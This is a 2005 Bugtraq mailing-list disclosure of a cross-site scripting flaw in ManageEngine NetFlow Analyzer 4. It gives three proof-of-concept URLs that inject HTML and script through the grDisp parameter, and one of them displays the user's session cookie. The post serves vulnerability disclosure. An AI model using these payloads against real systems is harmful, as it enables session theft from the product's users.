[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    NetFlow Analyzer 4 XSS Vulnerability
From:       why () nsfocus ! com
Date:       2005-10-18 3:37:24
Message-ID: 20051018033724.21717.qmail () securityfocus ! com
[Download RAW message or body]

NetFlow Analyzer 4
http://manageengine.adventnet.com/products/netflow/

I encountered Cross Site Scripting Vulnerabilities in some files of the NetFlow \
Analyzer 4, with this files, sending a specially crafted url you can execute commands \
in the client side.

____Proof of Concept______

http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<h1>test</h1>
 http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<script>alert("test")</script>
 http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<script>alert(document.cookie)</script>



Why, why@nsfocus.com


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic